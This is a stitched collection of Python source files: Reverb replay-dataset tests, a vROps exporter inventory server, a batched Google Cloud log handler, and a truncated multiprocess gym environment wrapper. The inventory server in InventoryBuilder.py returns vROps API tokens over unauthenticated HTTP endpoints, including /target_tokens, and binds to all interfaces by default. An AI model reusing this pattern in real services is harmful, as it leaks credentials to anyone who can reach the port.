['bounded_spec_signatured']) def test_incompatible_signature_dtype(self, table_name): self._populate_replay() dataset = reverb_dataset.ReplayDataset( self._client.server_address, table=table_name, dtypes=(tf.int64,), shapes=(tf.TensorShape([3, 3]),), max_in_flight_samples_per_worker=100) with self.assertRaisesWithPredicateMatch( tf.errors.InvalidArgumentError, r'Requested incompatible tensor at flattened index 4 from table ' r'\'{}\'. Requested \(dtype, shape\): \(int64, \[3,3\]\). ' r'Signature \(dtype, shape\): \(float, \[\?,\?\]\)'.format(table_name)): self._sample_from(dataset, 10) dataset_emit_sequences = reverb_dataset.ReplayDataset( self._client.server_address, table=table_name, dtypes=(tf.int64,), shapes=(tf.TensorShape([None, 3, 3]),), emit_timesteps=False, max_in_flight_samples_per_worker=100) with self.assertRaisesWithPredicateMatch( tf.errors.InvalidArgumentError, r'Requested incompatible tensor at flattened index 4 from table ' r'\'{}\'. Requested \(dtype, shape\): \(int64, \[3,3\]\). ' r'Signature \(dtype, shape\): \(float, \[\?,\?\]\)'.format(table_name)): self._sample_from(dataset_emit_sequences, 10) @parameterized.parameters(['signatured'], ['bounded_spec_signatured']) def test_incompatible_signature_shape(self, table_name): self._populate_replay() dataset = reverb_dataset.ReplayDataset( self._client.server_address, table=table_name, dtypes=(tf.float32,), shapes=(tf.TensorShape([3]),), max_in_flight_samples_per_worker=100) with self.assertRaisesWithPredicateMatch( tf.errors.InvalidArgumentError, r'Requested incompatible tensor at flattened index 4 from table ' r'\'{}\'. Requested \(dtype, shape\): \(float, \[3\]\). ' r'Signature \(dtype, shape\): \(float, \[\?,\?\]\)'.format(table_name)): self._sample_from(dataset, 10) dataset_emit_sequences = reverb_dataset.ReplayDataset( self._client.server_address, table=table_name, dtypes=(tf.float32,), shapes=(tf.TensorShape([None, 3]),), emit_timesteps=False, max_in_flight_samples_per_worker=100) with self.assertRaisesWithPredicateMatch( tf.errors.InvalidArgumentError, r'Requested incompatible tensor at flattened index 4 from table ' r'\'{}\'. Requested \(dtype, shape\): \(float, \[3\]\). ' r'Signature \(dtype, shape\): \(float, \[\?,\?\]\)'.format(table_name)): self._sample_from(dataset_emit_sequences, 10) @parameterized.parameters([1], [3], [10]) def test_incompatible_shape_when_using_sequence_length(self, sequence_length): with self.assertRaises(ValueError): reverb_dataset.ReplayDataset( self._client.server_address, table='dist', dtypes=(tf.float32,), shapes=(tf.TensorShape([sequence_length + 1, 3, 3]),), emit_timesteps=False, sequence_length=sequence_length, max_in_flight_samples_per_worker=100) def test_incompatible_dataset_shapes_and_types_without_signature(self): self._populate_replay() ds_wrong_shape = reverb_dataset.ReplayDataset( self._client.server_address, table='dist', dtypes=(tf.float32,), shapes=(tf.TensorShape([]),), max_in_flight_samples_per_worker=100) with self.assertRaisesRegex( tf.errors.InvalidArgumentError, r'Specification has \(dtype, shape\): \(float, \[\]\). ' r'Tensor has \(dtype, shape\): \(float, \[3,3\]\).'): self._sample_from(ds_wrong_shape, 1) ds_full_sequences_wrong_shape = reverb_dataset.ReplayDataset( self._client.server_address, table='dist', dtypes=(tf.float32,), shapes=(tf.TensorShape([None]),), emit_timesteps=False, max_in_flight_samples_per_worker=100) with self.assertRaisesRegex( tf.errors.InvalidArgumentError, r'Specification has \(dtype, shape\): \(float, \[\]\). ' r'Tensor has \(dtype, shape\): \(float, \[3,3\]\).'): self._sample_from(ds_full_sequences_wrong_shape, 1) @parameterized.parameters( ('dist', 1, 1), ('dist', 1, 3), ('dist', 3, 3), ('dist', 3, 5), ('dist', 10, 10), ('dist', 10, 11), ('signatured', 1, 1), ('signatured', 3, 3), ('signatured', 3, 5), ('signatured', 10, 10), ('bounded_spec_signatured', 1, 1), ('bounded_spec_signatured', 3, 3), ('bounded_spec_signatured', 3, 5), ('bounded_spec_signatured', 10, 10), ) def test_iterate_with_sequence_length(self, table_name, sequence_length, max_time_steps): # Also ensure we get sequence_length-shaped outputs when # writers' max_time_steps != sequence_length. self._populate_replay(sequence_length, max_time_steps=max_time_steps) dataset = reverb_dataset.ReplayDataset( self._client.server_address, table=table_name, dtypes=(tf.float32,), shapes=(tf.TensorShape([sequence_length, 3, 3]),), emit_timesteps=False, sequence_length=sequence_length, max_in_flight_samples_per_worker=100) got = self._sample_from(dataset, 10) for sample in got: self.assertIsInstance(sample, replay_sample.ReplaySample) # The keys and data should be batched up by the sequence length. self.assertEqual(sample.info.key.shape, (sequence_length,)) np.testing.assert_array_equal( sample.data[0], np.zeros((sequence_length, 3, 3), dtype=np.float32)) @parameterized.parameters( ('dist', 1), ('dist', 3), ('dist', 10), ('signatured', 1), ('signatured', 3), ('signatured', 10), ('bounded_spec_signatured', 1), ('bounded_spec_signatured', 3), ('bounded_spec_signatured', 10), ) def test_iterate_with_unknown_sequence_length(self, table_name, sequence_length): self._populate_replay(sequence_length) dataset = reverb_dataset.ReplayDataset( self._client.server_address, table=table_name, dtypes=(tf.float32,), shapes=(tf.TensorShape([None, 3, 3]),), emit_timesteps=False, sequence_length=None, max_in_flight_samples_per_worker=100) # Check the shape of the items. iterator = dataset.make_initializable_iterator() dataset_item = iterator.get_next() self.assertIsNone(dataset_item.info.key.shape.as_list()[0], None) self.assertIsNone(dataset_item.data[0].shape.as_list()[0], None) # Verify that once evaluated, the samples has the expected length. got = self._sample_from(dataset, 10) for sample in got: self.assertIsInstance(sample, replay_sample.ReplaySample) # The keys and data should be batched up by the sequence length. self.assertEqual(sample.info.key.shape, (sequence_length,)) np.testing.assert_array_equal( sample.data[0], np.zeros((sequence_length, 3, 3), dtype=np.float32)) @parameterized.parameters( ('dist', 1, 2), ('dist', 2, 1), ('signatured', 1, 2), ('signatured', 2, 1), ('bounded_spec_signatured', 1, 2), ('bounded_spec_signatured', 2, 1), ) def test_checks_sequence_length_when_timesteps_emitted( self, table_name, actual_sequence_length, provided_sequence_length): self._populate_replay(actual_sequence_length) dataset = reverb_dataset.ReplayDataset( self._client.server_address, table=table_name, dtypes=(tf.float32,), shapes=(tf.TensorShape([provided_sequence_length, 3, 3]),), emit_timesteps=True, sequence_length=provided_sequence_length, max_in_flight_samples_per_worker=100) with self.assertRaises(tf.errors.InvalidArgumentError): self._sample_from(dataset, 10) @parameterized.named_parameters( dict(testcase_name='TableDist', table_name='dist'), dict(testcase_name='TableSignatured', table_name='signatured'), dict( testcase_name='TableBoundedSpecSignatured', table_name='bounded_spec_signatured')) def test_iterate_batched(self, table_name): self._populate_replay() dataset = reverb_dataset.ReplayDataset( self._client.server_address, table=table_name, dtypes=(tf.float32,), shapes=(tf.TensorShape([3, 3]),), max_in_flight_samples_per_worker=100) dataset = dataset.batch(2, True) got = self._sample_from(dataset, 10) for sample in got: self.assertIsInstance(sample, replay_sample.ReplaySample) # The keys should be batched up like the data. self.assertEqual(sample.info.key.shape, (2,)) np.testing.assert_array_equal(sample.data[0], np.zeros((2, 3, 3), dtype=np.float32)) def test_iterate_nested_and_batched(self): with self._client.writer(100) as writer: for i in range(1000): writer.append({ 'observation': { 'data': np.zeros((3, 3), dtype=np.float32), 'extras': [ np.int64(10), np.ones([1], dtype=np.int32), ], }, 'reward': np.zeros((10, 10), dtype=np.float32), }) if i % 5 == 0 and i >= 100: writer.create_item( table='dist', num_timesteps=100, priority=1) dataset = reverb_dataset.ReplayDataset( self._client.server_address, table='dist', dtypes=(((tf.float32), (tf.int64, tf.int32)), tf.float32), shapes=((tf.TensorShape([3, 3]), (tf.TensorShape(None), tf.TensorShape([1]))), tf.TensorShape([10, 10])), max_in_flight_samples_per_worker=100) dataset = dataset.batch(3) structure = { 'observation': { 'data': tf.TensorSpec([3, 3], tf.float32), 'extras': [ tf.TensorSpec([], tf.int64), tf.TensorSpec([1], tf.int32), ], }, 'reward': tf.TensorSpec([], tf.int64), } got = self._sample_from(dataset, 10) self.assertLen(got, 10) for sample in got: self.assertIsInstance(sample, replay_sample.ReplaySample) transition = tree.unflatten_as(structure, tree.flatten(sample.data)) np.testing.assert_array_equal(transition['observation']['data'], np.zeros([3, 3, 3], dtype=np.float32)) np.testing.assert_array_equal(transition['observation']['extras'][0], np.ones([3], dtype=np.int64) * 10) np.testing.assert_array_equal(transition['observation']['extras'][1], np.ones([3, 1], dtype=np.int32)) np.testing.assert_array_equal(transition['reward'], np.zeros([3, 10, 10], dtype=np.float32)) def test_multiple_iterators(self): with self._client.writer(100) as writer: for i in range(10): writer.append([np.ones((81, 81), dtype=np.float32) * i]) writer.create_item(table='dist', num_timesteps=10, priority=1) trajectory_length = 5 batch_size = 3 dataset = reverb_dataset.ReplayDataset( self._client.server_address, table='dist', dtypes=(tf.float32,), shapes=(tf.TensorShape([81, 81]),), max_in_flight_samples_per_worker=100) dataset = dataset.batch(trajectory_length) iterators = [ dataset.make_initializable_iterator() for _ in range(batch_size) ] items = tf.stack( [tf.squeeze(iterator.get_next().data) for iterator in iterators]) with self.session() as session: session.run([iterator.initializer for iterator in iterators]) got = session.run(items) self.assertEqual(got.shape, (batch_size, trajectory_length, 81, 81)) want = np.array( [[np.ones([81, 81]) * i for i in range(trajectory_length)]] * batch_size) np.testing.assert_array_equal(got, want) def test_iterate_over_blobs(self): for _ in range(10): self._client.insert((np.ones([3, 3], dtype=np.int32)), {'dist': 1}) dataset = reverb_dataset.ReplayDataset( self._client.server_address, table='dist', dtypes=(tf.int32,), shapes=(tf.TensorShape([3, 3]),), max_in_flight_samples_per_worker=100) got = self._sample_from(dataset, 20) self.assertLen(got, 20) for sample in got: self.assertIsInstance(sample, replay_sample.ReplaySample) self.assertIsInstance(sample.info.key, np.uint64) self.assertIsInstance(sample.info.probability, np.float64) np.testing.assert_array_equal(sample.data[0], np.ones((3, 3), dtype=np.int32)) def test_iterate_over_batched_blobs(self): for _ in range(10): self._client.insert((np.ones([3, 3], dtype=np.int32)), {'dist': 1}) dataset = reverb_dataset.ReplayDataset( self._client.server_address, table='dist', dtypes=(tf.int32,), shapes=(tf.TensorShape([3, 3]),), max_in_flight_samples_per_worker=100) dataset = dataset.batch(5) got = self._sample_from(dataset, 20) self.assertLen(got, 20) for sample in got: self.assertIsInstance(sample, replay_sample.ReplaySample) self.assertEqual(sample.info.key.shape, (5,)) np.testing.assert_array_equal(sample.data[0], np.ones((5, 3, 3), dtype=np.int32)) def test_converts_spec_lists_into_tuples(self): for _ in range(10): data = [ (np.ones([1, 1], dtype=np.int32),), [ np.ones([3, 3], dtype=np.int8), (np.ones([2, 2], dtype=np.float64),) ], ] self._client.insert(data, {'dist': 1}) dataset = reverb_dataset.ReplayDataset( self._client.server_address, table='dist', dtypes=[ (tf.int32,), [ tf.int8, (tf.float64,), ], ], shapes=[ (tf.TensorShape([1, 1]),), [ tf.TensorShape([3, 3]), (tf.TensorShape([2, 2]),), ], ], max_in_flight_samples_per_worker=100) got = self._sample_from(dataset, 10) for sample in got: self.assertIsInstance(sample, replay_sample.ReplaySample) self.assertIsInstance(sample.info.key, np.uint64) tree.assert_same_structure(sample.data, ( (None,), ( None, (None,), ), )) def test_session_is_closed_while_op_pending(self): dataset = reverb_dataset.ReplayDataset( self._client.server_address, table='dist', dtypes=tf.float32, shapes=tf.TensorShape([]), max_in_flight_samples_per_worker=100) iterator = dataset.make_initializable_iterator() item = iterator.get_next() def _session_closer(sess, wait_time_secs): def _fn(): time.sleep(wait_time_secs) sess.close() return _fn with self.session() as sess: sess.run(iterator.initializer) thread = threading.Thread(target=_session_closer(sess, 3)) thread.start() with self.assertRaises(tf.errors.CancelledError): sess.run(item) class FromTableSignatureTest(tf.test.TestCase): def test_table_not_found(self): server = reverb_server.Server([ reverb_server.Table.queue('table_a', 10), reverb_server.Table.queue('table_c', 10), reverb_server.Table.queue('table_b', 10), ]) address = f'localhost:{server.port}' with self.assertRaisesWithPredicateMatch( ValueError, f'Server at {address} does not contain any table named not_found. ' f'Found: table_a, table_b, table_c.'): reverb_dataset.ReplayDataset.from_table_signature( address, 'not_found', 100) def test_server_not_found(self): with self.assertRaises(errors.DeadlineExceededError): reverb_dataset.ReplayDataset.from_table_signature( 'localhost:1234', 'not_found', 100, get_signature_timeout_secs=1) def test_table_does_not_have_signature(self): server = make_server() address = f'localhost:{server.port}' with self.assertRaisesWithPredicateMatch( ValueError, f'Table dist at {address} does not have a signature.'): reverb_dataset.ReplayDataset.from_table_signature( address, 'dist', 100) def test_sets_dtypes_from_signature(self): signature = { 'a': { 'b': tf.TensorSpec([3, 3], tf.float32), 'c': tf.TensorSpec([], tf.int64), }, 'x': tf.TensorSpec([None], tf.uint64), } server = reverb_server.Server( [reverb_server.Table.queue('queue', 10, signature=signature)]) dataset = reverb_dataset.ReplayDataset.from_table_signature( f'localhost:{server.port}', 'queue', 100) self.assertDictEqual(dataset.element_spec.data, signature) def test_sets_dtypes_from_bounded_spec_signature(self): bounded_spec_signature = { 'a': { 'b': tensor_spec.BoundedTensorSpec([3, 3], tf.float32, 0, 3), 'c': tensor_spec.BoundedTensorSpec([], tf.int64, 0, 5), }, } server = reverb_server.Server([ reverb_server.Table.queue( 'queue', 10, signature=bounded_spec_signature) ]) dataset = reverb_dataset.ReplayDataset.from_table_signature( f'localhost:{server.port}', 'queue', 100) self.assertDictEqual( dataset.element_spec.data, { 'a': { 'b': tf.TensorSpec([3, 3], tf.float32), 'c': tf.TensorSpec([], tf.int64), }, }) def test_combines_sequence_length_with_signature_if_not_emit_timestamps(self): server = reverb_server.Server([ reverb_server.Table.queue( 'queue', 10, signature={ 'a': { 'b': tf.TensorSpec([3, 3], tf.float32), 'c': tf.TensorSpec([], tf.int64), }, }) ]) dataset = reverb_dataset.ReplayDataset.from_table_signature( f'localhost:{server.port}', 'queue', 100, emit_timesteps=False, sequence_length=5) self.assertDictEqual( dataset.element_spec.data, { 'a': { 'b': tf.TensorSpec([5, 3, 3], tf.float32), 'c': tf.TensorSpec([5], tf.int64), }, }) if __name__ == '__main__': tf.disable_eager_execution() tf.test.main()
InventoryBuilder.py
from flask import Flask from gevent.pywsgi import WSGIServer from threading import Thread from resources.Resourceskinds import NSXTMgmtPlane from tools.Vrops import Vrops import time import json import os import logging logger = logging.getLogger('vrops-exporter') class InventoryBuilder: def __init__(self, atlas_config, port, sleep, timeout): self.atlas_config = atlas_config self.port = int(port) self.sleep = sleep self.timeout = int(timeout) self._user = os.environ["USER"] self._password = os.environ["PASSWORD"] self.vcenter_dict = dict() self.nsxt_dict = dict() self.target_tokens = dict() self.iterated_inventory = dict() self.vrops_collection_times = dict() self.response_codes = dict() self.successful_iteration_list = [0] self.wsgi_address = '0.0.0.0' if 'LOOPBACK' in os.environ: if os.environ['LOOPBACK'] == '1': self.wsgi_address = '127.0.0.1' thread = Thread(target=self.run_rest_server) thread.start() self.query_inventory_permanent() def run_rest_server(self): app = Flask(__name__) logger.info(f'serving /vrops_list on {self.port}') @app.route('/vrops_list', methods=['GET']) def vrops_list(): return json.dumps(self.vrops_list) logger.info(f'serving /inventory on {self.port}') @app.route('/<target>/vcenters/<int:iteration>', methods=['GET']) def vcenters(target, iteration): return self.iterated_inventory[str(iteration)]['vcenters'].get(target, {}) @app.route('/<target>/datacenters/<int:iteration>', methods=['GET']) def datacenters(target, iteration): return self.iterated_inventory[str(iteration)]['datacenters'].get(target, {}) @app.route('/<target>/clusters/<int:iteration>', methods=['GET']) def clusters(target, iteration): return self.iterated_inventory[str(iteration)]['clusters'].get(target, {}) @app.route('/<target>/hosts/<int:iteration>', methods=['GET']) def hosts(target, iteration): return self.iterated_inventory[str(iteration)]['hosts'].get(target, {}) @app.route('/<target>/datastores/<int:iteration>', methods=['GET']) def datastores(target, iteration): return self.iterated_inventory[str(iteration)]['datastores'].get(target, {}) @app.route('/<target>/vms/<int:iteration>', methods=['GET']) def vms(target, iteration): return self.iterated_inventory[str(iteration)]['vms'].get(target, {}) @app.route('/<target>/nsxt_mgmt_cluster/<int:iteration>', methods=['GET']) def nsxt_mgmt_cluster(target, iteration): return self.iterated_inventory[str(iteration)]['nsxt_resources'].get(target, {}) @app.route('/iteration', methods=['GET']) def iteration(): return_iteration = self.successful_iteration_list[-1] return str(return_iteration) @app.route('/collection_times', methods=['GET']) def collection_times(): vrops_collection_times = self.vrops_collection_times return json.dumps(vrops_collection_times) @app.route('/api_response_codes', methods=['GET']) def api_response_codes(): response_codes = self.response_codes return json.dumps(response_codes) # debugging purpose @app.route('/iteration_store', methods=['GET']) def iteration_store(): return_iteration = self.successful_iteration_list return json.dumps(return_iteration) # FIXME: this could basically be the always active token list. no active token? refresh! @app.route('/target_tokens', methods=['GET']) def token(): return json.dumps(self.target_tokens) try: if logger.level == 10: # WSGi is logging on DEBUG Level WSGIServer((self.wsgi_address, self.port), app).serve_forever() else: WSGIServer((self.wsgi_address, self.port), app, log=None).serve_forever() except TypeError as e: logger.error('Problem starting server, you might want to try LOOPBACK=0 or LOOPBACK=1') logger.error(f'Current used options: {self.wsgi_address} on port {self.port}') logger.error(f'TypeError: {e}') def get_vrops(self): with open(self.atlas_config) as json_file: netbox_json = json.load(json_file) self.vrops_list = [target['labels']['server_name'] for target in netbox_json if target['labels']['job'] == "vrops"] def query_inventory_permanent(self): # first iteration to fill is 1. while this is not ready, # curl to /iteration would still report 0 to wait for actual data self.iteration = 1 while True: # get vrops targets every run in case we have new targets appearing self.get_vrops() if len(self.successful_iteration_list) > 3: iteration_to_be_deleted = self.successful_iteration_list.pop(0) # initial case, since 0 is never filled in iterated_inventory if iteration_to_be_deleted == 0: continue self.iterated_inventory.pop(str(iteration_to_be_deleted)) logger.debug(f'deleting iteration {iteration_to_be_deleted}') # initialize empty inventory per iteration self.iterated_inventory[str(self.iteration)] = dict() logger.info(f'real run {self.iteration}') threads = list() for vrops in self.vrops_list: vrops_short_name = vrops.split('.')[0] thread = Thread(target=self.query_vrops, args=(vrops, vrops_short_name)) thread.start() threads.append((thread, vrops)) timeout = self.timeout timeout_reached = False start_time = time.time() current_time = start_time joined_threads = dict() while current_time <= (start_time + timeout): for t in threads: if not t[0].is_alive(): t[0].join() if t[0] not in joined_threads: joined_threads.setdefault(t[1], round(time.time() - start_time)) if len(joined_threads.keys()) >= len(threads): break time.sleep(1) current_time = time.time() else: still_running = [t for t in threads if t[0].is_alive()] for running_thread in still_running: logger.info(f"Timeout {timeout}s reached for fetching {running_thread[1]}") running_thread[0].join(0) timeout_reached = True for vrops in joined_threads: self.vrops_collection_times[vrops] = joined_threads[vrops] logger.info(f"Fetched {vrops} in {joined_threads[vrops]}s") self.get_vcenters() self.get_datacenters() self.get_clusters() self.get_hosts() self.get_datastores() self.get_vms() self.get_nsxt_mgmt_cluster() if len(self.iterated_inventory[str(self.iteration)]['vcenters']) > 0: self.successful_iteration_list.append(self.iteration) else: # immediately withdraw faulty inventory logger.debug(f'Withdrawing current iteration: {self.iteration}') self.iterated_inventory.pop(str(self.iteration)) self.iteration += 1 if not timeout_reached: logger.info(f'Inventory relaxing before going to work again in {self.sleep}s') time.sleep(int(self.sleep)) def query_vrops(self, vrops, vrops_short_name): logger.info(f'Querying {vrops}') token, self.response_codes[vrops] = Vrops.get_token(target=vrops) if not token: logger.warning(f'retrying connection to {vrops} in next iteration {self.iteration + 1}') return False self.target_tokens[vrops] = token logger.info(f'########## Collecting resources {vrops_short_name}... ##########') vcenter = self.create_vcenter_objects(vrops, token) nsxt_adapter = self.create_nsxt_objects(vrops, token) self.vcenter_dict[vrops] = vcenter self.nsxt_dict[vrops] = nsxt_adapter return True def create_vcenter_objects(self, target: str, token: str): vrops = Vrops() vcenter_adapter = Vrops.get_vcenter_adapter(vrops, target, token) if not vcenter_adapter: logger.critical(f'Could not get vcenter adapter!') return False logger.debug(f'Collecting vcenter: {vcenter_adapter.name}') datacenter = Vrops.get_datacenter(vrops, target, token, [vcenter_adapter.uuid]) cluster = Vrops.get_cluster(vrops, target, token, [dc.uuid for dc in datacenter]) datastores = Vrops.get_datastores(vrops, target, token, [dc.uuid for dc in datacenter]) hosts = Vrops.get_hosts(vrops, target, token, [cl.uuid for cl in cluster]) vms = Vrops.get_vms(vrops, target, token, [hs.uuid for hs in hosts], vcenter_adapter.uuid) for dc in datacenter: vcenter_adapter.add_datacenter(dc) for dc_object in vcenter_adapter.datacenter: logger.debug(f'Collecting datacenter: {dc_object.name}') for ds in datastores: if ds.parent == dc_object.uuid: dc_object.add_datastore(ds) logger.debug(f'Collecting datastore: {ds.name}') for cl in cluster: dc_object.add_cluster(cl) for cl_object in dc_object.clusters: logger.debug(f'Collecting cluster: {cl_object.name}') for hs in hosts: if hs.parent == cl_object.uuid: cl_object.add_host(hs) for hs_object in cl_object.hosts: logger.debug(f'Collecting host: {hs_object.name}') for vm in vms: if vm.parent == hs_object.uuid: hs_object.add_vm(vm) logger.debug(f'Collecting VM: {vm.name}') return vcenter_adapter def create_nsxt_objects(self, target: str, token: str): vrops = Vrops() nsxt_adapter = Vrops.get_nsxt_adapter(vrops, target, token) if not nsxt_adapter: return False nsxt_mgmt_plane = NSXTMgmtPlane(target, token) for adapter in nsxt_adapter: logger.debug(f'Collecting NSX-T adapter: {adapter.name}') nsxt_mgmt_plane.add_adapter(adapter) nsxt_mgmt_cluster = Vrops.get_nsxt_mgmt_cluster(vrops, target, token, [a.uuid for a in nsxt_adapter]) for adapter_object in nsxt_mgmt_plane.adapter: for mgmt_cluster in nsxt_mgmt_cluster: if mgmt_cluster.parent == adapter_object.uuid: adapter_object.add_mgmt_cluster(mgmt_cluster) logger.debug(f'Collecting NSX-T management cluster: {mgmt_cluster.name}') return nsxt_mgmt_plane def get_vcenters(self) -> dict: tree = dict() for vcenter_entry in self.vcenter_dict: vcenter = self.vcenter_dict[vcenter_entry] if not vcenter: continue tree[vcenter.target] = dict() for dc in vcenter.datacenter: tree[vcenter.target][vcenter.uuid] = { 'uuid': vcenter.uuid, 'name': vcenter.name, 'kind_dc_name': dc.name, 'kind_dc_uuid': dc.uuid, 'vcenter': vcenter.name, 'target': vcenter.target, 'token': vcenter.token, } self.iterated_inventory[str(self.iteration)]['vcenters'] = tree return tree def get_datacenters(self) -> dict: tree = dict() for vcenter_entry in self.vcenter_dict: vcenter = self.vcenter_dict[vcenter_entry] if not vcenter: continue tree[vcenter.target] = dict() for dc in vcenter.datacenter: tree[vcenter.target][dc.uuid] = { 'uuid': dc.uuid, 'name': dc.name, 'parent_vcenter_uuid': vcenter.uuid, 'parent_vcenter_name': vcenter.name, 'vcenter': vcenter.name, 'target': vcenter.target, 'token': vcenter.token, } self.iterated_inventory[str(self.iteration)]['datacenters'] = tree return tree def get_datastores(self) -> dict: tree = dict() for vcenter_entry in self.vcenter_dict: vcenter = self.vcenter_dict[vcenter_entry] if not vcenter: continue tree[vcenter.target] = dict() for dc in vcenter.datacenter: for datastore in dc.datastores: tree[vcenter.target][datastore.uuid] = { 'uuid': datastore.uuid, 'name': datastore.name, 'parent_dc_uuid': dc.uuid, 'parent_dc_name': dc.name, 'type': datastore.type, 'vcenter': vcenter.name, 'target': vcenter.target, 'token': vcenter.token, } self.iterated_inventory[str(self.iteration)]['datastores'] = tree return tree def get_clusters(self) -> dict: tree = dict() for vcenter_entry in self.vcenter_dict: vcenter = self.vcenter_dict[vcenter_entry] if not vcenter: continue tree[vcenter.target] = dict() for dc in vcenter.datacenter: for cluster in dc.clusters: tree[vcenter.target][cluster.uuid] = { 'uuid': cluster.uuid, 'name': cluster.name, 'parent_dc_uuid': dc.uuid, 'parent_dc_name': dc.name, 'vcenter': vcenter.name, 'target': vcenter.target, 'token': vcenter.token, } self.iterated_inventory[str(self.iteration)]['clusters'] = tree return tree def get_hosts(self) -> dict: tree = dict() for vcenter_entry in self.vcenter_dict: vcenter = self.vcenter_dict[vcenter_entry] if not vcenter: continue tree[vcenter.target] = dict() for dc in vcenter.datacenter: for cluster in dc.clusters: for host in cluster.hosts: tree[vcenter.target][host.uuid] = { 'uuid': host.uuid, 'name': host.name, 'parent_cluster_uuid': cluster.uuid, 'parent_cluster_name': cluster.name, 'datacenter': dc.name, 'vcenter': vcenter.name, 'target': vcenter.target, 'token': vcenter.token, } self.iterated_inventory[str(self.iteration)]['hosts'] = tree return tree def get_vms(self) -> dict: tree = dict() for vcenter_entry in self.vcenter_dict: vcenter = self.vcenter_dict[vcenter_entry] if not vcenter: continue tree[vcenter.target] = dict() for dc in vcenter.datacenter: for cluster in dc.clusters: for host in cluster.hosts: for vm in host.vms: tree[vcenter.target][vm.uuid] = { 'uuid': vm.uuid, 'name': vm.name, 'parent_host_uuid': host.uuid, 'parent_host_name': host.name, 'cluster': cluster.name, 'datacenter': dc.name, 'vcenter': vcenter.name, 'target': vcenter.target, 'token': vcenter.token, } self.iterated_inventory[str(self.iteration)]['vms'] = tree return tree def get_nsxt_mgmt_cluster(self) -> dict: tree = dict() for nsxt_entry in self.nsxt_dict: nsxt_mgmt_plane = self.nsxt_dict[nsxt_entry] if not nsxt_mgmt_plane: continue tree[nsxt_mgmt_plane.target] = dict() for nsxt_adapter in nsxt_mgmt_plane.adapter: for mgmt_cluster in nsxt_adapter.management_cluster: tree[nsxt_mgmt_plane.target][mgmt_cluster.uuid] = { 'uuid': mgmt_cluster.uuid, 'name': mgmt_cluster.name, 'nsxt_adapter_name': nsxt_adapter.name, 'nsxt_adapter_uuid': nsxt_adapter.uuid, 'target': nsxt_mgmt_plane.target, 'token': nsxt_mgmt_plane.token, } self.iterated_inventory[str(self.iteration)]['nsxt_resources'] = tree return tree
__init__.py
import logging import collections from queue import Queue, Empty from threading import Thread, Event from google.cloud import logging as glogging class GCloudBatchedLogHandler(logging.Handler): """ A batched log handler that sends the log output to Google Cloud Logging service using the Google cloud client library. When creating this handler, authentication for GCloud should be handled using one of the non-explicit credentials sending methods described in http://gcloud-python.readthedocs.io/en/latest/gcloud-auth.html. The handler stores upto batch_length (200 by default) log records or send_interval_in_ms (15 s by default) worth of log records before sending all those log records in a batch. """ def __init__(self, log_name=None, send_interval_in_ms=15000, batch_length=200, *args, **kwargs): """ Create a new GCloudBatchedLogHandler instance. :param log_name: Name of the log. Used as the log name in the gcloud client :type log_name: String :param send_interval_in_ms: Time (in milliseconds) to wait before sending the logs. The logs are sent either when this timeout is reached or when the **batch_length** logs are added. **15000** by default. :type send_interval_in_ms: Integer :param batch_length: Number of log items before sending the logs. **200** by default. :type batch_length: Integer """ super(GCloudBatchedLogHandler, self).__init__(*args, **kwargs) self.send_interval_in_ms = send_interval_in_ms self.batch_length = batch_length self.log_name = log_name self.logger = logging.getLogger("GCloudBatchedLogHandler") # dictionaries to store the queues used as buffers and events used as signals for each log_name self.queues = {} self.events = {} def _send_batch(self, log_name, queue, send_interval_in_ms, event): """ Method used by the threads. Keeps looping until the process is killed. In each loop, it sends all existing log records and waits for the timeout to expire or waits till a signal is sent to start processing (the signal is set when the count exceeds the batch_length member) """ while True: log_records = [] while True: try: log_record = queue.get(block=False) log_records.append(log_record) except Empty: break if len(log_records) > 0: gcloud_logger = glogging.Client().logger(log_name) self.logger.debug("Collected {} log records".format(len(log_records))) batch = gcloud_logger.batch() for log_record in log_records: info = { "message" : self.format(log_record), "python_logger": log_record.name } batch.log_struct(info, severity=log_record.levelname) batch.commit() self.logger.debug("committed {} log records".format(len(log_records))) event.wait(send_interval_in_ms/1000) self.logger.debug("Event set or timeout expired") def emit(self, log_record): log_name = self.log_name or log_record.name or '' # Create the Queue and Event objects for the log_name if they # don't exist already and start a new thread if not log_name in self.queues: self.queues[log_name] = Queue(0) self.events[log_name] = Event() t = Thread(target=self._send_batch, args=(log_name, self.queues[log_name], self.send_interval_in_ms, self.events[log_name])) t.daemon = True t.start() # Add the log_record to the queue target_queue = self.queues[log_name] target_queue.put(log_record) # If the queue size exceeds the batch_length, signal the waiting # thread to start sending the log records if target_queue.qsize() >= self.batch_length: self.logger.debug("Setting the event for {} at queue size {}".format(log_name, target_queue.qsize())) self.events[log_name].set()
subproc_vec_env.py
from multiprocessing import Process, Pipe import numpy as np from gym import spaces from mrl.utils.vec_env import VecEnv, CloudpickleWrapper def _worker(remote, parent_remote, env_fn_wrapper): parent_remote.close() env = env_fn_wrapper.var() while True: try: cmd, data = remote.recv() if cmd == 'step': observation, reward, done, info = env.step(data) if done: observation = env.reset() remote.send((observation, reward, done, info)) elif cmd == 'reset': observation = env.reset() remote.send(observation) elif cmd == 'render': remote.send(env.render(*data[0], **data[1])) elif cmd == 'close': remote.close() break elif cmd == 'get_spaces': remote.send((env.observation_space, env.action_space)) elif cmd == 'env_method': method = getattr(env, data[0]) remote.send(method(*data[1], **data[2])) elif cmd == 'get_attr': remote.send(getattr(env, data)) elif cmd == 'set_attr': remote.send(setattr(env, data[0], data[1])) else: raise NotImplementedError except EOFError: break class SubprocVecEnv(VecEnv): """ Creates a multiprocess vectorized wrapper for multiple environments :param env_fns: ([Gym Environment]) Environments to run in subprocesses """ def __init__(self, env_fns): self.waiting = False self.closed = False n_envs = len(env_fns) self.remotes, self.work_remotes = zip(*[Pipe() for _ in range(n_envs)]) self.processes = [ Process(target=_worker, args=(work_remote, remote, CloudpickleWrapper(env_fn))) for (work_remote, remote, env_fn) in zip(self.work_remotes, self.remotes, env_fns) ] for process in self.processes: process.daemon = True # if the main process crashes, we should not cause things to hang process.start() for remote in self.work_remotes: remote.close() self.remotes[0].send(('get_spaces', None)) observation_space, action_space = self.remotes[0].recv() self.goal_env = False self.goal_keys = None if isinstance(observation_space, spaces.Dict): dummy_env = env_fns[0]() self.dummy_env = dummy_env if dummy_env.compute_reward is not None: self.compute_reward = dummy_env.compute_reward if hasattr(dummy_env, 'goal_extraction_function') and dummy_env.goal_extraction_function is not None: self.goal_extraction_function = dummy_env.goal_extraction_function self.goal_env = True self.goal_keys = tuple(observation_space.spaces.keys()) VecEnv.__init__(self, len(env_fns), observation_space, action_space) def step_async(self, actions): for remote, action in zip(self.remotes, actions): remote.send(('step', 